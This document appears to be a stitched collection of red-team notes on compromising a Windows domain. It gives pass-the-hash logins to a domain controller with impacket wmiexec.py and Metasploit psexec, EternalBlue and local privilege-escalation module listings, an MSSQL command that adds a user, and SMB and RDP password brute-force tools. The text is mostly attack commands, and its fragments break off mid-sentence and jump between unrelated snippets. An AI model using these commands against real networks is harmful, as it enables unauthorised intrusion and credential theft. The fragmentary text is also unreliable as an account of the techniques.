Our goal is to obtain the hash of the domain administrator; with it we can pass the hash and log in to any machine in the domain:
proxychains wmiexec.py -hashes :42e265xxxxxx62387 administrator@10.10.10.201
Use psexec (PTH) to bring server-dc into MSF:
proxychains msfconsole
use exploit/windows/smb/psexec
set RHOST 10.10.10.201
set SMBUser Administrator
set SMBPass aad...
   7  exploit/windows/local/ms16_075_reflection_juicy  2016-01-16  great   Yes  Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)
   8  exploit/windows/local/ms16_014_wmi_recv_notif    2015-12-04  normal  Yes  Windows WMI Receive Notification Exploit

Interact with a module by name or index. For example info 8, u...
exploit/windows/smb/ms17_010_eternalblue
exploit/windows/smb/webexec
auxiliary/admin/smb/webexec_command
auxiliary/scanner/smb/impacket/wmiexec
auxiliary/admin/mysql/mysql_enum
auxiliary/admin/mysql/mysql_sql
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/mysql/mysql_hashdump
exploit/windows/mysql...
Interact with a module by name or index. For example info 8, use 8 or use exploit/windows/local/ms16_014_wmi_recv_notif

msf6 exploit(multi/handler) > use exploit/windows/local/ms16_016_webdav
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
...
use auxiliary/admin/mssql/mssql_exec
set cmd net user pass /add

ftp: FTP version scan
use auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/ftp/anonymous
use auxiliary/scanner/ftp/ftp_login

vnc: VNC (Virtual Network Console) is a well-known remote control tool, free open-source software that originated on UNIX and Linux operating systems; remote control...
The generate_mof function generates a MOF file; the MOF file, once consumed by WMI, runs a specific program (lib/msf/core/exploit/wbem_exec.rb). File-drop footprint on the target host: see below.

exploit ms17_010_eternalblue: the exploit/windows/smb/ms17_010_eternalblue module, EternalBlue SMB Remote Windows Kernel Pool Corruption ...
After obtaining the hash, use the wmiexec.py script from impacket to log in; a shell is obtained successfully:
python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:028b70314013e1372797cff51298880e redteam.red/administrator@10.10.10.8 -codec gbk
(-codec gbk decodes the command output of a Simplified-Chinese Windows console; the default is utf-8.) At this point we have a shell on the domain controller. But this shell is not stable; in a real environment we would still need to...
  14  auxiliary/scanner/smb/impacket/wmiexec  2018-03-19  normal  No  WMI Exec

4.3 Scanning with Nmap
Nmap can also be run from inside Metasploit; it not only determines which hosts on the target network are alive but also scans the operating...
NTscan scanning tool (Chinese-localized version): ipc/smb/wmi weak-password brute force //F:\pt007\f\security\批量135入侵工具包\ntscaner //Windows weak-password cracking: use the passwords obtained during internal-network penetration to generate a dictionary file and test with it.
3389 (RDP) password brute force //use the passwords obtained during internal-network penetration to generate a dictionary file and test with it: F:\pt007\f\2000hole\3389相关工具\fastrdpbrute1.1.2 ...